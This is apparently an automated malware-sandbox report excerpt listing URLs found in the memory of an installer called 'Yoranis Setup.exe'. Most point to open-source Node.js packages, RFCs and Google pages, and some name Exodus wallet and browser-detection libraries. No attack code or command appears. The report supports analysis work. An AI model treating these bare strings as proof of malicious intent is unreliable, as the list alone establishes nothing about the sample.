Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/RABEHAJA-STEVENS)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Rob--W/proxy-from-env#readme
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/Rob--W/proxy-from-env.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify#readme
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/RyanZim/universalify.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/STRML/async-limiter
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/node-socks-proxy-agent#readme
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TooTallNate/util-deprecate
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/TroyGoode)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexei)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/alexei/sprintf.js.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/alograg)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/andrasq)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/andrewrk/node-mv/blob/master/package.json
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/arose)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/beck)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/bitinn/node-fetch
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalk/wrap-ansi?sponsor=1
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalker/safer-buffer#why-not-safe-buffer)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/chalker/safer-buffer#why-not-safe-buffer).
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/daurnimator)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dominictarr/rc.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dominictarr/varstruct
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/dominictarr/varstruct.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/exodusmovement/seco-file#readme
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/exodusmovement/seco-file.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/exodusmovement/secure-container#readme
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/exodusmovement/secure-container.git
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/facebook/zstd
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/safe-buffer
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/simple-concat
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/simple-get
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/fredludlow)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/giann)
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/woff2
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/wuffs-mirror-release-c
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/google/xnnpack
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iarna/promise-inflight#readme
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iarna/promise-inflight.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iarna/unique-filename
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iarna/unique-filename.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/iarna/wide-align
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/minipass-fetch)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/minipass.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-tar.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/yallist.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/johnnyshields)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyeecheung/node-dep-codemod#dep005)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/joyent/node
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra/pull/141
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/lgeiger/node-abi/issues/54
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/litmit)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/pump
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-fs
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-fs.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/marob)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mikeal/tunnel-agent
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mrvisser)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/msimerson)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mysticatea/eslint-plugin-node/blob/master/docs/rules/no-deprecated-api.md)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nazar-pc)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/node4good/windows-autoconf
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/Release#release-schedule)).
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/TSC/blob/master/Moderation-Policy.md
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/gyp-next
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/gyp-next/archive/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#installation
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#installation)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#on-macos
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp#on-windows
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/issues/1779
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/issues/1861
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/issues/1927
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node-gyp/raw/master/macOS_Catalina_acid_test.sh
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/b3fcc245fb25539909ef1d5eaa01dbf92e168633/lib/path.js#L56
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/c8a04049/lib/internal/errors.js
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/master/CODE_OF_CONDUCT.md
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/8871#issuecomment-250915913
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/string_decoder
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/cacache
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/cli/blob/4c65cd952bc8627811735bea76b9b110cc4fc80e/lib/utils/ansi-trim.js
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/make-fetch-happen
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/minipass-fetch.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/move-file
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-semver.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/blob/51b6627a1f357d2eb433e7378e5f05e83b7aa6cd/lib/header.js#L349
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/issues/183
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/node-tar/pull/187
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/nopt.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/npmlog.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/ssri
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/npm/wrappy
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ohler/ert
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/oliversalzburg)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/pigulla)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ppollono)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/node-gyp-build.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild-install
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/prebuild/prebuild-install.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/rebeccapeltz)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/request/request/blob/b12a6245/lib/redirect.js#L134-L138
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/feross
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/isaacs
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/sponsors/sindresorhus
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/stingstrom)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tapjs/signal-exit
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tapjs/signal-exit.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/tim-kos/node-retry
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/timgates42)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/troygoode/node-require-directory/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-coff
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-machine-type
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-machine-type-descriptor
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-signature
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/pe-signature-offset
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/win-detect-browsers
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/vweevers/windows-env
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1202
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1869.
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/websockets/ws/issues/1940.
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/wodka)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/set-blocking#readme
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/set-blocking.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/y18n
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs#supported-nodejs-versions
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs-parser#supported-nodejs-versions
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs-parser.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/yargs/yargs.git
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/zkochan/packages/tree/main/which-pm-runs
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/zkochan/packages/tree/main/which-pm-runs#readme
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.freedesktop.org/xdg/xdgmime
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://gitlab.freedesktop.org/xorg/proto/xproto/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hackerone.com/reports/541502
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://hsivonen.fi/encoding-menu/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://html.spec.whatwg.org/multipage/comms.html#the-websocket-interface
Source: Yoranis Setup.exe, 00000000.00000003.330047764144.00000000079D0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://llvm.org/svn/llvm-project/cfe/tags/RELEASE_370/final/lib/Basic/Version.cpp
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.drString found in binary or memory: https://myactivity.google.com/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/require-directory.png?downloads=true&stars=true)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/require-directory/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodei.co/npm/smart-buffer.png?downloads=true&downloadRank=true&stars=true
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/api/fs.html#fs_stat_time_values)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://npm.im/$
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://npmjs.org/package/require-directory))
Source: uk.pak.0.drString found in binary or memory: https://passwords.google.com
Source: fr.pak.0.drString found in binary or memory: https://passwords.google.comCompte
Source: en-US.pak.0.drString found in binary or memory: https://passwords.google.comGoogle
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.drString found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.drString found in binary or memory: https://policies.google.com/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ponyfill.com/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://robwu.nl/)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://secure.travis-ci.org/troygoode/node-require-directory.png)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://semver.org/
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sindresorhus.com)
Source: Yoranis Setup.exe, 00000000.00000003.330023771717.0000000005E50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sourceforge.net/projects/wtl/files/WTL%2010/
Source: uk.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/a/answer/9122284
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.drString found in binary or memory: https://support.google.com/chrome/answer/6098869
Source: uk.pak.0.dr, en-US.pak.0.dr, fr.pak.0.dr, pt-BR.pak.0.drString found in binary or memory: https://support.google.com/chromebook?p=app_intent
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tidelift.com/security).
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc1928#section-3
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc5234#appendix-B.1
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://tools.ietf.org/html/rfc6455#section-9.1
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://travis-ci.org/JoshGlazebrook/smart-buffer)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://travis-ci.org/JoshGlazebrook/smart-buffer.svg?branch=master)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://twitter.com/intent/user?screen_name=troygoode)
Source: Yoranis Setup.exe, 00000000.00000003.330022974885.0000000005A50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://unpkg.com/cliui
